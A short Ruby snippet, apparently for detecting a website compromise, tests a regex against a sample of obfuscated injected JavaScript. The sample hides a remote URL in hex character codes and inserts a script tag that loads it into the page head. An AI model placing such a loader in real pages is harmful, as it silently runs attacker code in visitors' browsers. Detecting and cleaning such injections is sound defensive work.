re = /<script type='text\/javascript'>var _0x1e35=(.*)\;\(function\(_0x546a53,_0x3f720e\){(.*)}};(.*);var url=String(.*);var a=function\(\){var _0x22c9c8=document(.*)=url;document\['getElementsByTagName'\](.*);for\(var i=scrpts(.*){a\(\);}<\/script>/
str = '<script type=\'text/javascript\'>var _0x1e35=[\'length\',\'fromCharCode\',\'createElement\',\'type\',\'async\',\'code121\',\'src\',\'appendChild\',\'getElementsByTagName\',\'script\'];(function(_0x546a53,_0x3f720e){var _0x440369=function(_0x2e1b64){while(--_0x2e1b64){_0x546a53[\'push\'](_0x546a53[\'shift\']());}};_0x440369(++_0x3f720e);}(_0x1e35,0x1e1));var _0x5a05=function(_0x716551,_0x1d4a8e){_0x716551=_0x716551-0x0;var _0x2b7638=_0x1e35[_0x716551];return _0x2b7638;};var url=String[_0x5a05(\'0x0\')](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x73,0x61,0x73,0x6b,0x6d,0x61,0x64,0x65,0x2e,0x6e,0x65,0x74,0x2f,0x68,0x65,0x61,0x64,0x2e,0x6a,0x73,0x3f,0x76,0x65,0x72,0x3d,0x31,0x2e,0x30,0x2e,0x30);var a=function(){var _0x22c9c8=document[_0x5a05(\'0x1\')](String[_0x5a05(\'0x0\')](0x73,0x63,0x72,0x69,0x70,0x74));_0x22c9c8[_0x5a05(\'0x2\')]=String[_0x5a05(\'0x0\')](0x74,0x65,0x78,0x74,0x2f,0x6a,0x61,0x76,0x61,0x73,0x63,0x72,0x69,0x70,0x74);_0x22c9c8[_0x5a05(\'0x3\')]=!![];_0x22c9c8[\'id\']=_0x5a05(\'0x4\');_0x22c9c8[_0x5a05(\'0x5\')]=url;document[\'getElementsByTagName\'](String[_0x5a05(\'0x0\')](0x68,0x65,0x61,0x64))[0x0][_0x5a05(\'0x6\')](_0x22c9c8);};var scrpts=document[_0x5a05(\'0x7\')](_0x5a05(\'0x8\'));var n=!![];for(var i=scrpts[_0x5a05(\'0x9\')];i--;){if(scrpts[i][\'id\']==_0x5a05(\'0x4\')){n=![];}};if(n==!![]){a();}</script>'
# Print the match result
str.match(re) do |match|
puts match.to_s
end